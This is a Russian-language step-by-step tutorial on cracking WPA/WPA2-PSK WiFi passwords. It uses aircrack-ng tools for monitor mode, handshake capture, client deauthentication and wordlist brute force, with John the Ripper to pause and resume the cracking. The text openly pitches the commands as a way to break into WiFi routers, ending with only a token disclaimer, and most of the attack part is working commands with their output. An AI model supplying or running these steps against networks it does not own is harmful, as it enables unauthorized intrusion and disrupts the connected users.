Коротко о Aircrack-NG

Как Пользоваться AirCrack-NG — Взлом WiFi — Инструкция

Если вы хотите узнать, как взломать WiFi роутер — просто прочтите эту пошаговую инструкцию по использованию 

aircrack-ng
, выполните ряд проверенных команд и с легкостью взломайте пароль от WiFi.

С помощью этих команд вы сможете взломать WiFi роутер с WPA/WPA2-PSK (pre-shared key) шифрованием.

Основа этого способа взлома WiFi заключается в перехвате WPA/WPA2 рукопожатия во время аутентификации и взломе PSK с помощью 

aircrack-ng
.

Как взломать WiFi — основные шаги:

  1. Установите последнюю версии 
    aircrack-ng
  2. Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью 
    airmon-ng
  3. Запустите 
    airodump-ng
     для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID
  4. [Опционально] Используйте 
    aireplay-ng
     для де-аутентификации клиента
  5. Запустите 
    aircrack-ng
     для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия

1. Aircrack-ng: Скачать и Установить

Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший 

aircrack-ng
 из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.

Установите необходимы зависимости:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

 

Скачайте и установите последнюю версию 

aircrack-ng
 (текущая версия):

wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O --- | tar -xz
cd aircrack-ng-1.2-rc4
sudo make
sudo make install

Убедитесь что установлена именно последняя версия 

aircrack-ng
:

aircrack-ng ---help Aircrack-ng 1.2 rc4 --- (C) 2006-2015 Thomas d’Otreppe http://www.aircrack-ng.org

2. Airmon-ng: Режим Мониторинга

Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.

Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.

Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

Найдите и остановите все процессы, которые могут помешать:

$ sudo airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

$ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 6235 iwlwifi — [phy0] (monitor mode enabled on mon0)

В приведенном выше примере, 

airmon-ng
 создал новый беспроводной интерфейс 
mon0
 и переключил его в режим мониторинга.

Таким образом, 

mon0
 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

3. Airodump-ng: Перехват Рукопожатия

Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

Это можно сделать с помощью команды 

airodump-ng
:

$ sudo airodump-ng mon0

Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46
BSSID PWR Beacons #Data, #/s
CH MB ENC CIPHER AUTH
ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e
WPA2 CCMP PSK CrackMe 66:77:88:99:00:11 -64 134 345 34 1 54e
WPA2 CCMP PSK SomeAP BSSID STATION
PWR Rate Lost Frames Probe 00:11:22:33:44:55
AA:BB:CC:DD:EE:FF
-44 0 --- 1 114
56 00:11:22:33:44:55
GG:HH:II:JJ:KK:LL
-78 0 --- 1 0 1 66:77:88:99:00:11
MM:NN:OO:PP:QQ:RR -78 2 --- 32 0 1

Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите 

airodump-ng
 на том же канале с фильтром по BSSID:

$ sudo airodump-ng -c 1 —bssid 00:11:22:33:44:55 -w WPAcrack mon0 —ignore-negative-one

ОпцияОписание
-c
Канал беспроводной сети
--bssid
MAC адрес точки доступа
-w
Префикс файла в который будет записано рукопожатие
mon0
Сетевой интерфейс
--ignore-negative-one
Убирает сообщение ‘fixed channel : -1’

Теперь нам остается только ждать когда 

airodump-ng
 словит рукопожатие.

Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.

По прошествию некоторого времени вы должны увидеть сообщение 

WPA handshake: 00:11:22:33:44:55
 в правом верхнем углу экрана.

Это сообщение означает, что 

airodump-ng
 успешно перехватил рукопожатие:

CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15 WPA handshake: 00:11:22:33:44:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 --- 1 114 56

4. Aireplay-ng: Деаутентификации Клиента

Если вы не хотите ждать пока 

airodump-ng
 перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа.

После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

Отправить широковещательное deauth сообщение:

$ sudo aireplay-ng —deauth 100 -a 00:11:22:33:44:55 mon0 —ignore-negative-one

Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):

$ sudo aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 —ignore-negative-one

ОпцияОписание
--deauth 100
Сколько deauth сообщений отправить (0 — без ограничений)
-a
MAC адрес точки доступа
-c
MAC адрес клиента
mon0
Сетевой интерфейс
--ignore-negative-one
Убирает сообщение ‘fixed channel : -1’

5. Aircrack-ng: Взлом WiFi Пароля

К сожалению, кроме как с помощью грубой силы, не существует способа взлома WPA/WPA2-PSK шифрования.

Для взлома WiFi необходим словарь с паролями для перебора.

Главное помните, что этот способ взлома настолько хорош, насколько хорош ваш словарь с паролями.

Некоторые словари можно скачать отсюда.

Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

ОпцияОписание
-w
Путь к словарю с паролями
-b
MAC адрес точки доступа
WPAcrack.cap
Файл, содержащий перехваченное рукопожатие
Aircrack-ng 1.2 beta3 r2393 [00:08:11] 548872 keys tested (1425.24 k/s) KEY FOUND! [ 987654321 ] Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

6. Aircrack-ng: Пауза и Возобновление Перебора Паролей

Иногда нет возможности за один раз найти WPA/WPA2-PSK ключ с помощью 

aircrack-ng
, особенно когда используется очень большой словарь для перебора.

К сожалению, в 

aircrack-ng
 нет встроенной паузы и нельзя возобновлять остановленный перебор, но это можно делать с помощью John The Ripper, который умеет сохранять и возобновлять сессии.

Установите John The Ripper

Установите John The Ripper, если вы не сделали этого ранее:

$ sudo apt-get install john

Пауза/Возобновление Aircrack-ng

При переборе WPA/WPA2-PSK ключей с помощью John The Ripper, вы можете узнать о текущем прогрессе, нажав почти на любую клавишу.

При нажатии 

q
 либо 
Ctrl-C
, John The Ripper останавливает (ставит на паузу) перебор и сохраняет информацию о прогрессе текущей сессии в файл 
~/.john/john.rec
 (по умолчанию).

Для возобновления сессии, запустите John с опцией 

--restore=[имя сессии]
.

Создадим с помощью John The Ripper сессию 

foo
, через пайп перенаправим вывод в 
aircrack-ng
 и попробуем ПРИОСТАНОВИТЬ, а затем ВОЗОБНОВИТЬ перебор.

Aircrack-ng: НАЧАЛО ПЕРЕБОРА

Начнем Перебор WPA/WPA2-PSK ключей с помощью John The Ripper и 

aircrack-ng
:

$ john —session=foo —stdout —wordlist=wordlist.dic | aircrack-ng -w — -b 00:11:22:33:44:55 WPAcrack.cap

ОпцияОписание
--session
Имя сессии
--wordlist
Путь к словарю с паролями
-b
MAC адрес точки доступа
WPAcrack.cap
Файл содержащий перехваченное рукопожатие

Aircrack-ng: ПАУЗА

Нажмите 

q
 либо 
Ctrl-C
, чтобы остановить перебор.

Aircrack-ng: ВОЗОБНОВЛЕНИЕ

Возобновляем перебор с момента, когда он был остановлен (продолжаем сессию 

foo
):

$ john —restore=foo | aircrack-ng -w — -b 00:11:22:33:44:55 WPAcrack.cap

7. Подробнее о «John the Ripper» — Взломщик Паролей

«John the Ripper» — это быстрый взломщик паролей. Его основной целью является нахождение слабых UNIX паролей.

Вероятнее всего, Вам не нужно устанавливать «John the Ripper» для всей системы.

Вместо этого, после извлечения и компилирования исходного кода (см. ниже), Вы просто зайдете в директорию «run» и запустите Джона оттуда.

Собираем «John the Ripper»

Шаг 1: Скачаем последнюю версию «John the Ripper» и его подпись

wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2 $ wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2.sign $ wget http://www.openwall.com/signatures/openwall-signatures.asc

Шаг 2: Подтвердим подпись

Это необходимая мера безопасности, поскольку мы имеем дело с опасной вещью.

Для этого установим открытый ключ:

$ pgp -ka openwall-signatures.asc

И проверим подпись:

pgp john-1.7.9.tar.bz2.sign john-1.7.9.tar.bz2 gpg: Signature made Wed 23 Nov 2011 01:38:48 PM CAT using RSA key ID 295029F1 gpg: Good signature from «Openwall Project <signatures@openwall.com>» gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. Primary key fingerprint: 0C 29 43 AE 1E CD 24 EA 6E 0C B6 EE F5 84 25 69

Мы должны увидеть, аналогичное вышеуказанному, сообщение. Обращаем внимание на строку Good signature from «Openwall Project … «, которая означает успешную проверку подписи.

Предупреждение при проверке подписи, это нормально. Более подробную информацию, Вы можете найти по ссылке: http://www.kernel.org/signature.html.

Шаг 3: Извлекаем и компилируем исходники

tar xvfj john-1.7.9.tar.bz2 $ cd john-1.7.9/src/ $ make To build John the Ripper, type: make clean <system> where SYSTEM can be one of the following: linux-x86-64-avx Linux, x86-64 with AVX (2011+ Intel CPUs) linux-x86-64-xop Linux, x86-64 with AVX and XOP (2011+ AMD CPUs) linux-x86-64 Linux, x86-64 with SSE2 (most common) ***

Находим в списке нашу систему и набираем:

$ make clean <system>

Где <system> — установленная у нас операционная система. В случае если Вы не нашли свою систему в списке, используйте:

$ make clean generic

Если все прошло успешно, вышеперечисленные действия приводят к созданию исполняемых файлов для Джона и связанных с ним утилит, в директории «../run/».

Также, Вы можете скопировать всю папку «run» куда угодно и запускать Джона оттуда.

Теперь мы можем перейти в директорию «../run/» и протестировать работу Джона:

v $ cd ../run/ $ ./john —test Many salts: 400332 c/s real, 400332 c/s virtual Only one salt: 383795 c/s real, 391627 c/s virtual — Benchmarking: BSDI DES (x725) [32/32 BS]… DONE Many salts: 13362 c/s real, 13388 c/s virtual Only one salt: 13299 c/s real, 13299 c/s virtual — Benchmarking: FreeBSD MD5 [32/32 X2]… DONE Raw: 9225 c/s real, 9225 c/s virtual *** [/simterm]

Установка «John the Ripper» в Ubuntu

Выполните следующую команду для установки «John the Ripper» в Ubuntu:

$ sudo apt-get install john

Установка «John the Ripper» в CentOS/RHEL

Выполните следующую команду для установки «John the Ripper» в CentOS/RHEL:

$ yum install john

Информация предоставленная в данной статье носит исключительно ознакомительный характер, автор статьи не несет ответственности за возможное причинение вреда